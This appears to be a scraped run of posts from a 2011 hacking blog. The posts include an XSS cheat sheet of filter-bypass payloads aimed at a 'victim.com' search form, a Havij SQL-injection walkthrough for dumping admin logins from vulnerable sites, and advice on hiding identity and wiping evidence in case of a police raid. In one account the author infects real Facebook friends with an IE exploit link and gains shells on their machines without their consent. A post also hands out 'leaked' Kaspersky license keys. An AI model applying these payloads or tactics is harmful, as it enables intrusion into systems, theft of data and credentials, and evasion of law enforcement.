Trust your instincts - If an email or email attachment seems suspicious, don't open it, even if your anti-virus software indicates that the message is clean. Attackers are constantly releasing new viruses, and the anti-virus software might not have the signature. At the very least, contact the person who supposedly sent the message to make sure it's legitimate before you open the attachment. However, especially in the case of forwards, even messages sent by a legitimate sender might contain a virus. If something about the email or the attachment makes you uncomfortable, there may be a good reason. Don't let your curiosity put your computer at risk.

Save and scan any attachments before opening them - If you have to open an attachment before you can verify the source, take the following steps:

Be sure the signatures in your anti-virus software are up to date

Save the file to your computer or a disk.

Manually scan the file using your anti-virus software.

If the file is clean and doesn't seem suspicious, go ahead and open it.

Apart from these there are some of my older posts which can be useful for you:

4 Gmail tips that you should know

Phishing - Can your browser protect you?

DARKLORD!!

Cross site scripting(XSS) Cheat Sheet - Readers Choice!!

2011-12-11T23:04:00.000+05:30

Hello friends. These days I am on an XSS rampage. I recently posted an article on XSS vulnerability in Babylon search. Since then I got several request from the readers to post a quick article on cross site scriptting. This tutorial will be divided into two parts. In the first part I will cover the basics of XSS and how the attack vector is implemented. In the next tutorial we will discuss some techniques by which we can prevent XSS attacks.

OWASP lists sql injection and XSS as the two most common vulnerabilities in web pages and web apps. We have covered SQL injection quiet extensively so I decided to write on xss.

Cross Site Scripting or XSS is a web application attack that involves injecting a piece of malicious code into the vulnerable web application/web page. The attacker injects a client side script mainly through the web browser to reach the other users of the particular website. This attack can open several doors for the attacker ranging from session hijacking to entire database compromise.

Reflected or Non-persistent XSS attack

This is the most common form of XSS attack in which the attackers crafts a malicious code and transfers it to the server side either through the HTTP request parameter or through some HTML form submission. A simple Reflected XSS attack looks like this-

Consider this real time example of reflected XSS in action:

XSS vulnerability in Babylon Search

Stored or Persistent XSS attack

This attack is more dangerous and complicated compared to reflected XSS attack. In Stored or persistent XSS attack, the vulnerable script is stored on the target server and is activated once another user clicks on it. For example, consider a forum where the attacker posts a message containing a link to malicious script. Another user when views the message and clicks it, then the script activates and causes respective attack.

The attacker can craft a malicious script like a cookie stealing script of the form <script>alert(document.cookie);</script>and steal victims cookies to perform session hijacking.

DOM based XSS attack

DOM or document object model based XSS attacks tries to exploit the structure of the page in which they reside. The attacker tries to trick the browser to execute the JavaScript or HTML code of his choice. Unlike the other two XSS attacks, DOM based attack takes the advantage of vulnerable javascript which executes directly in the user’s browser.

Consider the following piece of code:

var loc = document.location + '?gotoHomepage=1';
document.write('<a href="' + loc + '">Home</a>');

The javascript variable document.location can easily be compromised by the attacker to pass a malicious javascript as it has no user input filters. A url of the form : http://site.com/index.html?<script>alert(document.cookie)</script> can be created and passed as the HTTP header and can be executed directly into user’s document.

Complete Cheat Sheet on XSS:

<html><font color="Red"><b>Pwned</b></font></html>

"><script>alert('xss')</script>

Bypassing Xss Simple Filteration Without Alteration:

Now we notice, the above script we used for filtration is evolving only a few strings, knowing there are bunch of ways and

strings to inject a malicious request.

It's only filtering '< > /' means leaving hackers with a vast amount of other strings to inject a malicious code.

Now the question is since '<' and '>' are filtered, how we will be able to send a javascript or html code injection?

Well, the answer is quite easy, javascript can be executed using ' and " before the orignal script.

For instance,

')alert('xss');

This will generate an alert box again on a vulnerable server.

Secondly,

");alert('xss');

This will too generate an alert box on a vulnerable server.

Bypassing Advance Xss Filtration:

Some webmasters filter lot more than this, especially it's filtered on important sites like gov and org sites.
But all depends on their pattern if they are doing this in javascript, we will of course just alter the page but what if the filtration is not in javascript, instead is in html or php or even asp.
There's nothing impossible, we will try to get as much info about the filtration as much we can.
Supposing a server that have filtered all strings just more than common in a way that it reads the malicious string in the beginning or in the end to avoid and abort it, this of course can be bypassed too!

An example can be likely so:

helloworld<script>alert('xss')</script>

The above script will bypass filtration for the server that reads the malicious string in the beginning.

helloworld<script>alert('xss')<script>helloworld

This will bypass filtration on server that reads whether in the beginning or in the end or at both ends!
Mostly, this kind of filtration isn't common, so cant be of much use.
Some webmasters also filter the word 'xss' so it's likely to use some other message for making an alert.

<script>alert('hello world')</script>

This will bypass message filtration.

Now we will study some more advance filtration bypass.

Some webmasters just simply define a pattern of a cross-site scripting script that is possibly common.

In this case, I will mention here the full array of strings to inject, bypassing the filtration.

We will suppose injecting in a search form.

victim.com/search.php?query="><script>alert('hello world')</script>
victim.com/search.php?query="><script>alert("hello world")</script>
victim.com/search.php?query="><script>alert("hello world");</script>
victim.com/search.php?query="><script>alert(/hello world");</script>
victim.com/search.php?query=//"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc<script>alert(/hello world/);</script>
victim.com/search.php?query=abc"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=abc//abc"></script>alert(/hello world/);</script>
victim.com/search.php?query=000"><script></script><script>alert(1337);</script>
victim.com/search.php?query=000abc</script><script>alert(/1337/);</script>
victim.com/search.php?query=--<script>"></script>alert(/1337/);</script>
victim.com/search.php?query=pwned<script>document.write('abc');</script>
victim.com/search.php?query=pwned</script><script>document.write(1337);</script>
victim.com/search.php?query=pwned')alert(1337);//
victim.com/search.php?query=pwned";)alert(1337);//
victim.com/search.php?query=pwned");alert(/pwned/);//
victim.com/search.php?query=pwned//"></script><script>location.href='javascript:alert(/pwned/);</script>
victim.com/search.php?query="><img src='javascript:alert('xss');'>
victim.com/search.php?query="><script src='http://malicous js'</script>

These are a few simple and advanced scripts that can be used to check for XSS vulnerability. There are several automatic tools available as well but I would recommend that you first learn the manual method so that you can clearly understand the attack vector. Later on you can switch to automatic tools. In case you know any other XSS script that is missing in this tutorial then you can add in the comment box and I will update it in this tutorial along with your name.
Special Thanks : str0ke,USMAN,tushy,Hackman,shubham,Fix

DARKLORD!!

Namedpipe impersonation Attacks

2011-12-10T00:54:00.001+05:30

Privilege escalation through namedpipe impersonation attack was a real issue back in 2000 when a flaw in the service control manager allowed any user logged onto a machine to steal the identify of SYSTEM. We haven't heard a lot about this topic since then, is it still an issue?

First of all, let's talk about the problem.

When a process creates a namedpipe server, and a client connects to it, the server can impersonate the client. This is not really a problem, and is really useful when dealing with IPC. The problem arises when the client has more rights than the server. This scenario would create a privilege escalation. It turns out that it was pretty easy to accomplish.
For example, let's assume that we have 3 processes: server.exe, client.exe and attacker.exe. Server.exe and client.exe have more privileges than attacker.exe. Client.exe communicates with server.exe using a namedpipe. If attacker.exe manages to create the pipe server before server.exe does, then, as soon as client.exe connects to the pipe, attacker.exe can impersonate it and the game is over.

First of all there are some flags buried in the CreateFile documentation to give control to the pipe client over what level of impersonation a server can perform. They are called the "Security Quality Of Service".

There are 4 flags to define the impersonation level allowed.

SECURITY_ANONYMOUS
The server process cannot obtain identification information about the client, and it cannot impersonate the client.

SECURITY_IDENTIFICATION
The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. ImpersonateNamedpipeClient will succeed, but no resources can be acquired while impersonating the client. The token can be opened and the information it contains can be read.

SECURITY_IMPERSONATION - This is the default
The server process can impersonate the client's security context on its local system. The server cannot impersonate the client on remote systems.

SECURITY_DELEGATION
The server process can impersonate the client's security context on remote systems.

There are also 2 other flags:

SECURITY_CONTEXT_TRACKING
Specifies that any changes a client makes to its security context is reflected in a server that is impersonating it. If this option isn't specified, the server adopts the context of the client at the time of the impersonation and doesn't receive any changes. This option is honored only when the client and server process are on the same system.

SECURITY_EFFECTIVE_ONLY
Prevents a server from enabling or disabling a client's privilege or group while the server is impersonating.

Every time you create a pipe in client mode, you need to find out what the server needs to know about you and pass the right flags to CreateFile. And if you do, don't forget to also pass SECURITY_SQOS_PRESENT, otherwise the other flags will be ignored.

Unfortunately, you don't have access to the source code of all the software running on your machine. I bet there are dozen of software running on my machine right now opening pipes without using the SQOS flags. To "fix" that, Microsoft implemented some restrictions about who a server can impersonate in order to minimize the chances of being exploited.

A server can impersonate a client only if one of the following is true.

The caller has the SeImpersonatePrivilege privilege.
The requested impersonation level is SecurityIdentification or SecurityAnonymous.
The identity of the client is the same as the server.
The token of the client was created using LogonUser from inside the same logon session as the server.

Only Administrators/System/SERVICES have the SeImpersonatePrivilege privilege. If the attacker is a member of these groups, you have much bigger problems.

Complete Guide to staying Anonymous on Internet - Combining VMs and VPNs

2011-12-08T21:34:00.001+05:30

"the Reason which makes Anonymous hactivists dangerous is that they are really ANONYMOUS - Darklord"

Hello friends. Sorry for the delay in post. Still waiting for the day when time will be in abundance for me. Today I have an interesting post for you all. In one of my several older posts I have been discussing how to penetrate different websites, perform attacks, gain information etc. But there is a big issue behind all this.

While doing all these things we are putting our identity at stake. A real hacker always keeps his identity hidden and clears all tracks while dealing with such activities. Staying anonymous is a big kung-fu battle in this dangerous world of internet. So in this post I will try to solve this problem.

Many of you might be aware of using TOR network as a way of staying anonymous but it is only half true. It does protect you to some extent but you need to add more efforts to keep yourself underground. In this tutorial we will learn how to setup a anonymous network using TOR virtual network and Virtual machines. So I am considering that you are aware of TOR and installing Virtual machines. I will be using Virtual box for this tutorial.

Note : If you use some other free VPN service then you can use it in place of TOR. Also If you have a paid VPN service then it will be an added benefit as it will provide you more anonymity and VPN bandwidth. In this tutorial I am using TOR as an example.

We will start with our virtual machine. Suppose you have a Windows XP setup as a virtual machine. The first thing we have to do is to change the MAC address of the VM. To do this , go to the Virtualbox instance and select the Virtual machine, then click on SETTINGS. Move to the NETWORK tab. Choose the NAT adapter.

Click on the ADVANCE drop down menu to list the MAC address. You will notice something similar to the shown image. Now change this MAC address to some other value. keep in mind to keep the number of characters equal to 12 and use same number of alphabets and numbers.

Once you are done with changing the MAC address, the next step will be to start your winXP virtual machine and setup the TOR network.

NOTE : In case you are using a wireless router then you can further enhance your anonymity by spoofing its MAC address first and then change the MAC for VM's NAT adapter.

Now run your XP virtual machine and install TOR in it. TOR can be downloaded from here.
After installing, run the program and wait till it connects to the tor network.

Once the network is setup, it will automatically start firefox browser which you can use for anonymous surfing. Now there is another step you can do in order to prevent websites from tracking your activities by installing cookies.
In the firefox instance, click on TOOLS, then click START PRIVATE BROWSING.
This will further add anonymity to your activities.

What did just happen? Why a Virtual machine? Why not setup a tor network directly? Lots of questions. Let us address them.

The reason why we are using a virtual machine in this tutorial is that it will be like building a virtual identity for you. Whenever you have to perform some private task then you can move to the virtual machine and when you have to do normal browsing then you can switch back to the host operating system.
The other reason for using VM is that you can spoof its MAC address and in turn protect your real MAC address. This increases your anonymity as both the IP address and the MAC address are fake now.
So the combination of VM and VPN makes it hard to trace you back.
Further more its really easy to delete the complete virtual drive that you have created for installing Windows XP virtual machine and remove all traces. All your activities and logs will be deleted in a go( in case police raids you :-) ). Further more, before closing the virtual machine you can use a tool like ccleaner to clean all your internet activities. It will delete the entire browing history, cookies, cache etc.

There is an important point to remember while using this setup : Never use your real information on any website while browsing.

While using this setup make sure that you don't log into website using your real information. This is the reason why this setup seperates your real identity with your virtual identity while surfing the internet.
I cant say too much about what is the reason for it but if you are a real hacker who is looking to hide his activities then you must be getting what I mean to say.
Another thing that can truly turn you anonymous is by using a paid VPN service. They offer good bandwidth and great level of anonymity by bouncing and relaying connections multiple times. So if you use use a paid VPN in this setup then it will turn you completely anonymous.
This is a completely unique post. I didn't find anything of this sort on the internet but I have been using this setup from quiet some time. If you have any queries about this post then add your comments here. There are still lots of ways by which you can improve this setup to make your completely untraceable. I am still exploring it. I want you all to work with me and see if you can make improvements in this post. I will add changes as updates. Looking forward for suggestions.

DARKLORD!!

HackingAlert Enters Beta phase for Renewation

2011-12-05T00:56:00.000+05:30

Hello friends. Yeas 2011 has been a very good for HackingAlert. Especially the last 5 months. The blog has seen tremendous growth over this year. Lots of new reader and followers joined it and also encouraged me with their comments and suggestions. Day by day , month by month the traffic kept on growing and today HackingAlert is amongst the high ranked blogs in terms of hacking and network security.

Change is not only the law of nature, its the law of web world as well. Change is necessary to eradicate the issues and shortcomings to make things more and more user friendly and rich. HackingAlert is also ready to move for a change. A change that will make it more fast, flexible and user friendly.

HackingAlert has been operating on the same theme and layout style from past couple of years. There are lots of things which needs a new look and feel in the blog. HackingAlert is going to complete its 3 years of operation in January next year. So with the aim of bringing a better user experience, HA is entering into beta phase for the month of December. The blog will undergo complete over-hauling in this course of one month and lots of new features will be added.

Some of the expected features that I am targeting for now are :

Better layout and template style.
Better commenting options
Change in tab contents
Faster loading time
Easier methods for social sharing of blog contents
Make it more content rich.

As for now these are the few things in my mind. I will request my readers to please provide suggestions which they feel should be brought in this blog. The biggest strength of any blog is its readers and their experience with it. So i will humbly request all my readers to add valuable suggestions in the comment box below to make HackingAlert a better place and leave a bigger impact in the year 2012.

When Social Networks Become Social Engineering Tools for hacking - A Case study of hacking 10 Facebook friends in 10 minutes

2011-12-04T01:08:00.000+05:30

These days hacking community is buzzing with social engineering techniques for hacking. People discuss what can be the best social engineering technique they can adopt. These days I am addicted to 2 things very badly. One is metasploit and other is Social networks( facebook to be precise).

So I though of mixing these two addictions of mine to craft a special Social engineered attack vector. I don't know weather anyone has ever thought or used this technique before but HackingAlert is certainly the first to report about it( If its not on google, its no where).

In my attack vector I created a malicious url that exploited a known vulnerability of Internet explorer. Then I shared this link on social media through my account. Now here comes the concept of Social engineering. Since the malicious link is posted on my wall or in my tweet so everyone in my friend list or followers tends to trust it.
They consider it as a normal link to some useful information. This is where the use of social mediums like Facebook becomes prankey.

In my several posts I have always laid stress that we should not trust everything that appears in your feed or tweets. No matter if it is shared by our friend or colleague. You should first examine it and see weather it looks suspicious or not. The best way is to Right click and copy the link and open it in a different browser. This will protect your social identity from any threat like spam or session hijacking etc.

Let me give you a quick look at my attack vector. Here is the link that I shared on my wall which appeared in all my friend's feeds.

Immediately after sharing this link, my friends started commenting and clicking on it. It is just a malicious link which can exploit a vulnerability in Internet Explorer and allow arbitrary code execution.

So all I had to do now is set up a listener for back connections and sit back and wait. It's exactly like catching a fish. You attach some food in the hook and wait for fish to come and eat it and in-turn get caught (hacked).

Look at the image below. Lots of IP addresses were reported in my console. Those who were lucky (not using IE) got rid of this attack. The error ".net CLR not found" represents those calls in which Internet explorer was not the browser in use.

If you notice the scroll bar in the right of the image then you can imagine how many back connection requests I got.

The luck ones who wrere not using IE were safe but there were some unlucky ones as well. To be precise I got around 10 active sessions in first 10 minutes. And then I tweeted the link on twitter with a catchy statement. In an hour I had more acive sessions than I can remember.

Successful execution of this attack vector provided me with a direct shell connectivity through which I could control the attacked users. It will be a cake walk to start a key sniffer to record key strokes or at worse install backdoors ( though I didn't do these things).

There is something serious I want to discuss here. If you have followed everything so far in this post then you might have figured out that there is hardly anything that Facebook can do to prevent this types of attacks.

If my friend is using an unpatched version of IE browser and opens any link which appears in his social profile without giving it a second look then this is his mistake. Its like banging your own head on the wall.

So I will end this post with two conclusions which I want that all my readers should follow strictly :

Always use an updated version of browsers.
Don't trust everything that people share on their social profiles. You never know when you can become the FISH caught in the hook.

Note : If you are one of my friends who read this post and also clicked on the link which I shared then I am really sorry. I had to do this in order to build this post. But I have caused no harm to your system. It was purely educational purpose. Hope you are not offended.

DARKLORD!!

XSS vulnerability in Babylon search

2011-12-03T02:05:00.001+05:30

Recently I installed a software which changed my default search of firefox to Babylon search. It is a popular search engine and ranks high in alexa. The search engine can be reached at http://search.babylon.com/home

The search engine is vulnerable to a perticular type of XSS attack. Since no one has ever reported about a vulnerability in this search engine so I can take the credit ( cool man! ) .

The search engine can be XSSed by first adding a normal string at the beginning and then add the script. Since the search engine has implemented XSS filtering so it can be bypassed by crafting a different vector.

Notice the search term that I have used here. On executing the script, an alert box will be displayed notifying the successful execution of script.
Here is the complete vulnerable url :

http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&babsrc=home&s=web&as=0&t=0

Complete SQL injection tutorial with Havij

2011-12-03T00:44:00.001+05:30

Hello friends. This is my third post on SQL injection and for the first time I am using a tool for explaining it. Here I will be using a popular and my personal favourite SQLi tool Havij. To download Havij visit the following link - DOWNLOAD HAVIJ.

Let us now understand how this tool works. The tutorial can be used for any SQLi tool as the basic functioning is same for all. First thing you need to do is find a vulnerable site.
You can find a detailed SQL injection tutorial - HERE.
You can use blind SQL injection technique to figure out weather a site is vulnerable or not.
To check a website for vulnerability, you will first have to reach to a page that accesses the database and is of the form : www.site.com/product.php?id=23

Now simply add an apostrophe( ' )to the end of url and press enter. If the website replies with an error then it shows that the website is vulnerable to SQL injection. Look at the url in the following image( sorry for the over editing of image but it was really needed) . Notice the ' at the end of url and also the error responded from the database.

The error will look something like this : Warning: mysql_num_rows(): supplied argument is not a valid MySQL

So now that we have a vulnerable site for testing, we will now move ahead with using Havij and try to discover admin details of the website. In fact we can dig out every detail from the database using havij. Let us see how.

1. Start Havij and copy the url in TARGET address.( the same url which we used to test for sql injection vulnerability but without ' ).

2. Click on the ANALYZE button and wait for Havij to discover the database files for you.

3. At the bottom of the Havij terminal you will see the search progress.

4. Once a database is found, you can click on TABLES tab to view the available tables.

You will be presented with all the tables that are available in the database of the website. It contains all the information that is displayed on the webpage. The next target can be to look for a table that contains some information about admin login details. .

5. In our example the table tbl_admin looks like a table that may contain admin details. Select that table and click on GET COLUMNS.

6. You will be listed with various columns that are present in the table.

7. Now select those columns whose data you want to retrieve.

8. After selecting the various columns, click on GET DATA to get the values stored in the columns.
You can see in the figure how Havij has successfully retrieved the admin login details for us.

This technique can also be used to dig out the other user details of the website. Keep experimenting.

Well I will leave you with a question . What to do with this admin details now ??
wait for the next post for answer. In case you have an answer then add it in comments below.

DARKLORD!!

The Mole - New SQL injection tool+tutorial

2011-12-02T18:28:00.001+05:30

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.

Features

Support for injections using Mysql, SQL Server, Postgres and Oracle databases.

Command line interface. Different commands trigger different actions.

Auto-completion for commands, command arguments and database, table and columns names.

Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.

Developed in python 3.

Download tutorial

Download Mole for Winodws

Download Mole for Linux

Rooting An Android Phone From Scratch - My Experiments with Truth!!

2011-11-27T00:22:00.000+05:30

Hello Friends. From past 3 days I was on an rooting rampage with my HTC Tattoo android phone. I was a fan of Android before I ever rooted my phone and now I am in love with it since I have rooted it. The real power of any operating system lies when you have the command of the super user. This is what rooting is all about.

Rooting a device needs two things. First the right set of files for rooting and second the courage to play with a 12,000 Rs phone that you brought by saving your earnings( the cost of phone may vary depending upon the heaviness of your surname). These days I started small development work on android to learn its basics. I am looking forward to dive deep into this mobile OS. From past few days I was very much troubled with the word "rooting" and was getting really restless about it. Finally I decided on 23-11-2011 to finally sit down,leave all work and start my work on android rooting. So i started with working on android SDK first. Working of Android SDK is fairly simple and is just like the linux command line( in-fact it is a unix command line). After getting an overview of the basics of android-windows-sdk , I switched on to look for various commands and mode of working of it. Then I moved ahead to root my android phone. And finally after a struggle of 3 days I finally rooted my phone and installed a custom ROM. Oops I forgot to define what is rooting.

Rooting means to gain permissions of a superuser or the root user in any Unix based OS. This is a universal definition for a unix based Os which contains a special super user called root.
So to gain privilege of root is called rooting.
Android sdk also contains a a superb tool calld Android Debug Bridhe(ADB). It is a tool that is used to send commands to the android device using a laptop/PC. We will be extensively using it in this experiment.

Well there are lots of excellent rooting tutorials and videos available on the internet for free. You can find lots of useful resources. I will recommend you to check the threads of xda-developers forum which has some of the finest posts on rooting android phone. The main reason for creating this post is to let my readers gain intrest in exploring things. The fun of gadgets is not just in using them. The real fun lies in technically playing with them. So I am creating this post to encourage my readers to explore their android devices ( rather spoil!! ) and feel its power.
I still tried to remain a bit different from various soruces I found on the internet and which I used to root my phone. What I have done here is I have created a single folder called tattoo.rar which can be downloaded from here - DOWNLOAD.
This file can be directly downloaded and unzipped to any drive. Then by using the set of commands below you can get root privilege to your phone and later on install a higher version of Android ROM on it.

Before we begin we will have to download the android sdk. It can be downloaded from HERE. Once you have downloaded it, unzip it to any drive, say C drive. Open the folder and run SDKmanager.exe . If you are running it for the first time then it will show you a list of packages that you can install from the list.
You will have to install just one package for the time being. That is Android-sdk platform tools.

Once you have finished installing the pakage the next thing you can do is set the class path in environment variables. This is an optional step but it can speed up your process of working.
To set up the environment variables Right click on My Computer, Go to properties, then Advance System Settings , then Environment Variables. In System Variables, look for PATH. Double click on it to edit it. Then add the following path in it :

;c:\android-sdk-windows\tools;c:\android-sdk-windows\platform-tools

Now you are all set. To check what you have done, open command prompt type adb. Yo will see a list of options.
Now coming back to the downloaded file, tattoo.rar. Unzip it to any folder of your choice. Suppose I unzipped it in my c drive.
Now start command prompt and change directory to c:/tattoo
Your prompt should look something like this : c:/tattoo>

Now plug your HTC tattoo to USB. At the command prompt type the following command;
adb devices
If it shows a device listed, it means your device is connected and responding.
Let us proceed. Now execute the following commands in the same sequence as mentioned.

1. Let's say you have everything unpacked into C:\Tattoo
2. In your terminal (on your PC) type:
- adb shell "mkdir /data/local/bin" (if it returns an error it means that the directory already exists, just proceed)
- adb push m7 /data/local/bin/
- adb push su /data/local/bin/
- adb push flash_image /data/local/bin/
- adb push tattoo-hack.ko /data/local/bin/
- adb push recovery.img /sdcard
- adb push boot.img /sdcard
3. We have every needed file on the phone now. Type now (we are still in your terminal):
- adb shell
$ cd /data/local/bin
$ chmod 766 m7 (I don't retain this step as mandatory, so if this process fails, just proceed)
$ while ./m7 ; do : ; done
lots of text until you see something like "wrote shell code", press enter 2 or 3 times enter to see:
#
4. Then perform this:
- # export LD_LIBRARY_PATH=/system/lib
- # export PATH=/system/bin
- # insmod ./tattoo-hack.ko
- # mount -o rw,remount /dev/block/mtdblock5 /data
- # mount -o rw,remount /dev/block/mtdblock3 /system
- # cat ./su > /system/bin/su
- # chmod 4755 /system/bin/su
- # chmod 755 ./flash_image

Successful execution of these commands will root your device and you can now have full rights on your HTC tattoo phone.
Now how to check if rooting is successful or not. To check it, switch off your phone. Now press the "Home" key and then power it own. You will see a recovery screen similar to the one in figure.

As you can see you are now presented with certain boot options which were previously not available for you. Now along with rooting the device with the set of commands mentioned above, we also flashed the SD card so that it becomes capable of installing custom ROM's. Custom ROM's are developed using a perticular version of android with a different interface. Installing a custom ROM can enhance your mobile performance. You can find lots of custom ROM available on the internet. I would recommend to check out this page - Custom ROM. It has whole list of custom ROM's for HTC Tattoo.
I chose a custom ROM based on Android 2.3 Gingerbred so as to upgrade my old Android 1.6 pre-installed OS. This is the biggest advantage of rooting. You can install higher versions of OS even if the manufacturer is not producing updates. All you have to do is simply download a custom ROM and copy it in the SD card. Dont copy in any folder, just inside the card in zip format. Now in the above image you will find an option "install zip from SD card". Once you click on it you will be presented with a screen similar to the one shown below :

You can see the two zip custom ROMs available on my SD card which I had copied. Now I can select any one of them and install it on my phone. Once the installation is complete, reboot your phone and you are ALLLLL DDOONNEE !!

Finally you will have a new version of android installed on your phone.

SPECIAL NOTE : Rooting has certain advantages but it has disadvantages too. There can be several components which might not function properly. So before installing any custom ROM make sure it has all the basic common functions. Like in my case the Camera is not working but the battery usage and speed has increased greatly. Also there are numerous One-Click Root applications available for android devices who can automatically root your phone but I would recommend that you go for this manual approach it will give better understanding.

Hope you enjoyed reading this tutorial. If you too have a HTC Tattoo and you are bored of Dounut then dont wait, just jump to GingerBred. I bet you will love it.
Do Leave your comments and suggestions.

DARKLORD!!

Setting up your own Pentesting/Hacking Network using a single Machine

2011-11-23T10:34:00.001+05:30

Hello friends. Sorry for the long delay in writing a new post. I was out for some days and had no internet connectivity. When I came back and checked my mail, I found more than 10 mails asking me how to test for hacking. Actually this problem is because of the fact that there are too many theoretical tutorials available on the internet but there are hardly any practical implimentations shown.

So the big problem lies in testing your knowledge. Unless you don't have practical exposure to hacking, you cannot really understand the strength of it. So I decided to reveal the professionals secret of pentesting/hacking. The technique I will discuss here will be advantageous for those who have only single system and want to set up a testing network using it. In case you have multiple systems then you can easily test for your skills by making one system as target and other as attacker. But what to do when we have only a single system at our disposal. Need not to worry. Virtual machine is the ultimate solution. You can set up your own hacking network and apply your skills to gain practical exposure to hacking.
The only thing to look for is your systems hardware configuration. You should have minimum 2 GB RAM but it is highly recommended to use 3 GB RAM for a 32 bit operating system.
We will be using Oracle VirtualBox in this tutorial. You can download virtualbox from this link - VBox.
Once you have installed Vbox, the next step is to download the Extensions pack. You can get it from this link - VBox Extension pack.

Once you have followed this initial steps, you are half done. The next step is to setup a target operating system. Suppose you want to set WINDOWS XP SP2 as the target operating system. You will need a bootable Windows XP SP2 iso for that. You can easily download it from Microsoft website or torrent. You can refer to this quick tutorial on how to setup a virtual machine using VBox and WIN XP.

So now you have a virtual machine where you can test all your applications and hacks.
What is the next step that you can do with this virtual machine ? Let us install a WAMP server and run DVWA over it. For those who are not aware of DVWA can check this link - Installing and working with DVWA.

How to install applications on a virtual machine? Well the process is simple. When your Windows XP Virtual machine is running, then click on the DEVICE tab, move to USB and select your pendrive from the list.

Now you can install anything from a USB drive inside your virtual machine. There is also a facility to create shared folder with your host operating system but I would prefer that you use USB. Shared folder has some issues when your host operating system is Windows 7. You can install different servers, applications, RAT clients etc and play with it.

Now what is the advantage of this virtual machine . Let us analyse:

You can test all the viruses and RATs without any fear as your base operating system will not be affected.
You can test different servers and applications easily without affecting your base operating system.
In case the Virtual machine gets corrupt then you can re-install it.

There are also some key factors that you should remember which will help you during your pentesting:

Create a clone of the virtual machine
This step is very helpful in case your VM gets corrupt. Creating a clone of it will prevent you from re-installing it again and again.
You can create a clone by Right clicking on the Virtul machine instance in VBox and click on "clone.."
You will notice that a cloned virtual WinXP will be created for you.

Disable the windows Firewall

The next important thing you can do is disable the windows firewall and then perform your pentesting as the firewall may block some of the suspicious activities. Using the default Windows firewall of XP virtual machine you can also test weather your activity is traceable or not. This will give you a clear understanding why RATs are not considered as a suitable hack these days because they are easily detectable. You can disable the firewall by going to control pannel, clicking on Firewall and then disable it.
In this way you can set up a suitable environment for your home experiments.

WHAT NEXT ?

Well a good question to ask if you have understood the above concepts. So far we discussed how to test different tools and techniques on a virtual operating system. The next step will be how to hack one virtual machine using the other. The scenario will be similar to hacking any system on internet so this technique will give you a real time exposure. Intresting... Lets proceed then. This time we will set up another virtual machine using BACKTRACK operating system which is one of the most widely used penetration testing operting system by security professionals. The reason which makes backtrack so popular is:

It has all the relevant tools pre-installed
it is linux based.

You can download the Backtrack 5 iso from its official website. Its a must have operating system for all.

You can follow this simple video to install BT on virtualbox.

Once you are done with the installation part, the next step is to make the two virtual machines (BT and WinXP) connect with each other. There is a simple setting that you will have to make in both the virtual machines. Let's check it out.

Select the Backtrack virtual machine, then click on settings tab, then move to "network" settings. You will find that "Adapter 1" is set to NAT adapter. Switch to the "Adapter 2" tab.

In the Adapter2 tab, set the adapter as "Host-Only Adapter". Set the name of adapter as "VirtualBox Host Only Ethernet Adapter" . See the figure.

Make similar setting changes in your windows XP virtual machine as well. Now your two virtual machines are ready to connect with each other. You can check the IP address of Windows machine by using the ipconfig command in the command prompt and similarly you can check the IP address of the BT machine using the ifconfig command. Also you can ping the two machines to check if both are detecting each other (don't forget to disable the windows firewall else it will filter the ping data packets).
The following image shows my two virtual machines. One is WinXP and other is BT5 with there corresponding ip addresses. Both are running ovr my host operating system Win7. So in all there are 3 operating systems running simultaneously.

Now you can use various options available in Backtrack OS to perform tests on the WinXP box. Let us quickly perform a nmap scan to check the open ports on WinXP machine.

As you can see that the target is up and has some open ports as well. Similarly you can perform several attacks and use the tools available in Backtrack to penetrate the target windows XP machine without harming your own operating system.
You can use this technique to perform several tests like :

You can try to hack different operating systems by installing them as a virtual machine.
This will have a real time simulation of original scenario.
You can increase the level of difficulty of your hacks by installing firewalls, IDS/IPS etc.
This is a self customization scenario where you can do what ever you want.

This is just a quick example for you all to get started with using VM's for pentesting and hacking. You can further take this tutorial to next level by experimenting with various flavors of operating systems and try your hands on them . This can be like a practice Battlefield for you before you dive deep into the real fight.

There are several small problems which you may encounter while performing these steps. So keep adding your queries so that I can help you resolve them. This is one of the most uniquest tutorial you will find on the internet. So keep adding your comments and queries so that you can enjoy this technique. Once you have successfully performed it, you will love playing with this scenario.

DARKLORD!!

Kaspersky Pure and Kaspersky 2012 Latest keys - Not Blocked

2011-11-15T11:03:00.001+05:30

Some latest keys for Kaspersky are leaked again. Grab your key immideately. Stay connected with HackingAlert for regular updates of Kespersky keys.

Activation Method:

1. Open Kaspersky 2011 License Manager (from lower right corner).

2. Click Activate the application with a new license button. (Delete any trial key
first,by clicking the red X next to the key).

3. Select Activate commercial version and enter the activation license code as
11111-11111-11111-1111X

4. Wait activation wizard message->Click OK

5. Wait for wrong activation code message->Click OK->

6. Screen will appear with KEY FILE BROWSE

7. Browse to the key
location and activate kaspersky.

DOWNLOAD KEYS

Hacking Alert

Review of Hackbook - Beginner's guide to hacking

Metasploit penetration testing Cookbook released!

From free blog hosting to International Author - A journey of 3 years

Internet Observatory Setting New Heights with Real-Time IP Traffic Trends

Technologies that will heat up in 2012

BlogRoll 2011 - Top 5 Articles of 2011 on HackingAlert

BlogRoll 2011 - Most Popular Tutorials on HackingAlert

Contribute to HackingAlert : Submit An Article on Technologies that will heatup in 2012

A simple HTML tag to crash 64-bit Windows 7

SOPA - the end of internet as we know it!!

Downloading torrent files through IDM

5 Things to do when you are hit by a Facebook spam

"It Happens on Live television" Facebook spam demystified - A completely new form of Spam

Why Email attachments can be dangerous?

Cross site scripting(XSS) Cheat Sheet - Readers Choice!!

Namedpipe impersonation Attacks

Complete Guide to staying Anonymous on Internet - Combining VMs and VPNs

HackingAlert Enters Beta phase for Renewation

When Social Networks Become Social Engineering Tools for hacking - A Case study of hacking 10 Facebook friends in 10 minutes

XSS vulnerability in Babylon search

Complete SQL injection tutorial with Havij

The Mole - New SQL injection tool+tutorial

Rooting An Android Phone From Scratch - My Experiments with Truth!!

Setting up your own Pentesting/Hacking Network using a single Machine

